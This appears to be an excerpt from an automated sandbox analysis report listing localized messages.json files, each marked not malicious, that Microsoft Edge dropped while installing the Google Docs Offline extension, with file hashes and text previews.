                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):908
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                                                              MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                                                              SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                                                              SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1285
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                                                              MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                                                              SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                                                              MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                                                              SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                                                              SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                                                              MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                                                              SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                                                              SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3107
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                                                              MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                                                              SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                                                              SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                                                              MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                                                              SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                                                              SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1763
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                                                              MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                                                              SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):930
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                                                              MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                                                              SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):913
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                                                              MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                                                              SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                                                              SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                                                              SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):806
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                                                              MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                                                              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                                                              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):883
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                                                              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                                                              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                                                              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                                                              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                                                              MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                                                              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                                                              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1613
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                                                              MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                                                              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
